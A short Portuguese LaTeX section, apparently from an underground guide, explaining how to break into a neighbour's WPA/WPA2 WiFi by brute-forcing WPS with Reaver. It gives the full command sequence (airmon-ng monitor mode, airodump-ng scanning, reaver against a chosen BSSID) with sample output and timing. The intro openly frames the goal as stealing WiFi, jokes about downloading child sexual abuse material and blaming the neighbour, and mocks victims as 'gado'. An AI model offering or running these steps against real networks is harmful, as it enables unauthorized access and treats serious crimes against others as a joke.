\section{Invadindo WiFi com Reaver}

\noindent
\par Você é um NEET que näo tem dinheiro para pagar suas contas? Quer baixar CP colocando a culpa no vizinho? É um mendigo que tem um laptop? Não importa a razão, se você está lendo isso, você quer roubar o WiFi de alguém.

\subsection{Pré-requisitos}
\begin{itemize}
\item Uma distro Linux;
\item Reaver;
\item airmon-ng + airodump-ng.
\end{itemize}

\subsection{Procedimento}

\noindent \par Primeiramente, você terá que colocar sua placa de rede no modo monitor. Para tanto, use estes comandos:

\begin{itemize}
\item \texttt{\$ iwconfig}\\
  Isso listará suas placas de rede;
\item \texttt{\# airmon-ng start wlan0}\\
  Isso colocará sua placa de rede em modo monitor (no meu caso, é a wlan0).
\end{itemize}
 
\noindent \par Agora, é necessário pegar o endereço MAC dos roteadores próximos:\\

\noindent \par \texttt{\# airodump-ng wlan0}\\

 
\noindent \par Um exemplo do que vai aparecer:
\footnotesize
\begin{verbatim}
BSSID               PWR  Beacons  #Data,  #/s  CH   MB   ENC   CIPHER   AUTH  ESSID      
0A:1B:2C:3D:4E:5F   -23  46       0       0    3    54e  WPA2  CCMP     PSK   rede_do_anao
\end{verbatim}
\normalsize

\noindent \par Quando achar a rede que quer, copie o endereço MAC/BSSID (lembrando que a criptografia tem que ser WPA2 ou WPA).

\noindent \par Agora, é só executar o Reaver usando o comando (trocando a placa e o BSSID de acordo):\\

\noindent \par \texttt{\# reaver -i wlan0 -b 0A:1B:2C:3D:4E:5F -vv}\\

\noindent \par Comigo, demorou 3 horas para quebrar a senha, mas a documentação do Reaver diz que pode demorar de 4 a 10 horas. Também, deve-se ter em consideração que o computador tem que estar relativamente próximo do roteador.
 
\subsection{Observação}
O Reaver não funciona com roteadores que têm o WPS desabilitado, mas o gado nem deve saber o que é isso, então aproveitem.

\clearpage
